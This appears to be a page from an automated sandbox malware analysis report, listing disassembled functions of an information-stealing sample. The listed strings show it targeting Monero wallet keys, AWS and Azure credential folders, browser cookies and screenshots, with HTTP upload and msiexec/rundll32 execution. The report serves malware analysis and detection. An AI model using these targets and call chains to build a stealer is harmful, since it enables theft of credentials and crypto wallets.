                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00BD5F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BD5F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BD5F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6000
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD600D
                                    • HttpOpenRequestA.WININET(00000000,018BE708,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD5C48
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 4aa3005c33c67d748889b79e539c9b1f4712ca179ac13fd4b82d34776d634b97
                                    • Instruction ID: 9a7a152934f54a651c90407d657a16d1f868ae4a700d81ffc348fd6771dc20ea
                                    • Opcode Fuzzy Hash: 4aa3005c33c67d748889b79e539c9b1f4712ca179ac13fd4b82d34776d634b97
                                    • Instruction Fuzzy Hash: F4120C72D20158ABCB15EBA1DDA5FEEB3BDBF24700F1145D9B106621A1EF307A48CB61
                                    Function 00BDCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BDD1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BDD1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD308
                                    • lstrcat.KERNEL32(?,00BF1570), ref: 00BDD317
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD32A
                                    • lstrcat.KERNEL32(?,00BF1574), ref: 00BDD339
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD34C
                                    • lstrcat.KERNEL32(?,00BF1578), ref: 00BDD35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD36E
                                    • lstrcat.KERNEL32(?,00BF157C), ref: 00BDD37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD390
                                    • lstrcat.KERNEL32(?,00BF1580), ref: 00BDD39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD3B2
                                    • lstrcat.KERNEL32(?,00BF1584), ref: 00BDD3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD3D4
                                    • lstrcat.KERNEL32(?,00BF1588), ref: 00BDD3E3
                                      • Part of subcall function 00BEAB30: lstrlen.KERNEL32(00BD4F55,?,?,00BD4F55,00BF0DDF), ref: 00BEAB3B
                                      • Part of subcall function 00BEAB30: lstrcpy.KERNEL32(00BF0DDF,00000000), ref: 00BEAB95
                                    • lstrlen.KERNEL32(?), ref: 00BDD42A
                                    • lstrlen.KERNEL32(?), ref: 00BDD439
                                      • Part of subcall function 00BEAD80: StrCmpCA.SHLWAPI(00000000,00BF1568,00BDD2A2,00BF1568,00000000), ref: 00BEAD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDD4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 3b68f8e71e035e1f40181c23623fb335429c987803a0ef25c491415d164e4944
                                    • Instruction ID: 971d21b032de7e8d53f039d2ade16e0ac39bb2d1ab91ac638ad9384afcc56298
                                    • Opcode Fuzzy Hash: 3b68f8e71e035e1f40181c23623fb335429c987803a0ef25c491415d164e4944
                                    • Instruction Fuzzy Hash: 4FE12E72910148AFCB04EBA5DD96EEE77BDAF68301F1145D8F106761A1DF31BA08CB62
                                    Function 00BDCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,018BD228,00000000,?,00BF1544,00000000,?,?), ref: 00BDCB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BDCB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00BDCB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BDCBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BDCBD9
                                    • StrStrA.SHLWAPI(?,018BD240,00BF0B56), ref: 00BDCBF7
                                    • StrStrA.SHLWAPI(00000000,018BD270), ref: 00BDCC1E
                                    • StrStrA.SHLWAPI(?,018BDA50,00000000,?,00BF1550,00000000,?,00000000,00000000,?,018B8E70,00000000,?,00BF154C,00000000,?), ref: 00BDCDA2
                                    • StrStrA.SHLWAPI(00000000,018BDAB0), ref: 00BDCDB9
                                      • Part of subcall function 00BDC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BDC971
                                      • Part of subcall function 00BDC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BDC97C
                                    • StrStrA.SHLWAPI(?,018BDAB0,00000000,?,00BF1554,00000000,?,00000000,018B8EA0), ref: 00BDCE5A
                                    • StrStrA.SHLWAPI(00000000,018B9040), ref: 00BDCE71
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B47), ref: 00BDCA43
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B4B), ref: 00BDCA57
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B4E), ref: 00BDCA78
                                    • lstrlen.KERNEL32(00000000), ref: 00BDCF44
                                    • CloseHandle.KERNEL32(00000000), ref: 00BDCF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 2cbc2f5f498f87d93fe9bc87094ef9d257e74a16f7f31ff157e73d881515f24c
                                    • Instruction ID: 5d82ab495df2402d180f62da1e196f083a147fc5fa73e8cb4e57aba5b13bca40
                                    • Opcode Fuzzy Hash: 2cbc2f5f498f87d93fe9bc87094ef9d257e74a16f7f31ff157e73d881515f24c
                                    • Instruction Fuzzy Hash: B0E1D871D10148ABCB14EBA5DDA2FEEB7BDAF68300F014599F10667191EF307A49CB61
                                    Function 00BE84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,018BAE78,00000000,00020019,00000000,00BF05BE), ref: 00BE8534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BE85B6
                                    • wsprintfA.USER32 ref: 00BE85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BE860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8629
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 460cc431b10fb0af7cbf074c62aab7bb9d31391b5af0cc05daf1bc053275b84b
                                    • Instruction ID: 586ccf3f97380adbb923c8841f58d6b0de9db7d8286865aec8cd7746bac02ffd
                                    • Opcode Fuzzy Hash: 460cc431b10fb0af7cbf074c62aab7bb9d31391b5af0cc05daf1bc053275b84b
                                    • Instruction Fuzzy Hash: 5F81E771911158AFDB24DB65CD95FEAB7B8FF58700F1082D8A10AA6190DF707B88CFA0
                                    Function 00BE4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE5000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00BE501D
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4B7C
                                      • Part of subcall function 00BE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00BE50A9
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                      • Part of subcall function 00BE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                      • Part of subcall function 00BE4B60: FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE5118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BE5135
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4C00
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF08D3), ref: 00BE4C15
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4C32
                                      • Part of subcall function 00BE4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00BE4C6E
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,018BE598), ref: 00BE4C9A
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,00BF0FE0), ref: 00BE4CAC
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,?), ref: 00BE4CC0
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,00BF0FE4), ref: 00BE4CD2
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,?), ref: 00BE4CE6
                                      • Part of subcall function 00BE4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00BE4CFC
                                      • Part of subcall function 00BE4B60: DeleteFileA.KERNEL32(?), ref: 00BE4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: a95705621287a17b2a34d9eab0369d059edc000126c8b9b8f769e5cad246e917
                                    • Instruction ID: b43d5dbe878ab14aa9abd2db9520c8220b948f748ff5e052e6f32ddf73f84a71
                                    • Opcode Fuzzy Hash: a95705621287a17b2a34d9eab0369d059edc000126c8b9b8f769e5cad246e917
                                    • Instruction Fuzzy Hash: 814194BAA50208A7DB10F770EC57FED736C9B65704F0049D4B289660D1EEB5A7CC8B92
                                    Function 00BE91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BE91FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 2aa79afa0057fd35a787eb0f6d6033e2e618d47be1f811379336823115093ee8
                                    • Instruction ID: c2855c7244ef5731ede92fe6facfa8ae24beaa16975298cdc7537d37701adbdf
                                    • Opcode Fuzzy Hash: 2aa79afa0057fd35a787eb0f6d6033e2e618d47be1f811379336823115093ee8
                                    • Instruction Fuzzy Hash: E371C9B1A14208AFDB14DFE5DC89FEEB7B8AF58700F108549F556A7290DB34E948CB60
                                    Function 00BE3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE3415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE35AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: f0706d32cd2790ff732fcaebfc1fb0ff1832eb2b2179b1da962173e4e728c0ca
                                    • Instruction ID: cc6f165af55f7d33599f2ad9056ee18f6a748497c087a39961c2a754dffb12ec
                                    • Opcode Fuzzy Hash: f0706d32cd2790ff732fcaebfc1fb0ff1832eb2b2179b1da962173e4e728c0ca
                                    • Instruction Fuzzy Hash: 8B12FA71D101489ACB18FBA1DDA2FEEB7BDAF24300F1145E9E10666192EF347B49CB61
                                    Function 00BD9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BD9A50: InternetOpenA.WININET(00BF0AF6,00000001,00000000,00000000,00000000), ref: 00BD9A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00BD9CAF
                                    • lstrcat.KERNEL32(?,00BF12C4), ref: 00BD9CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00BD9CD5
                                    • lstrcat.KERNEL32(?,00BF12C8), ref: 00BD9CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00BD9CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00BD9D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00BD9D17
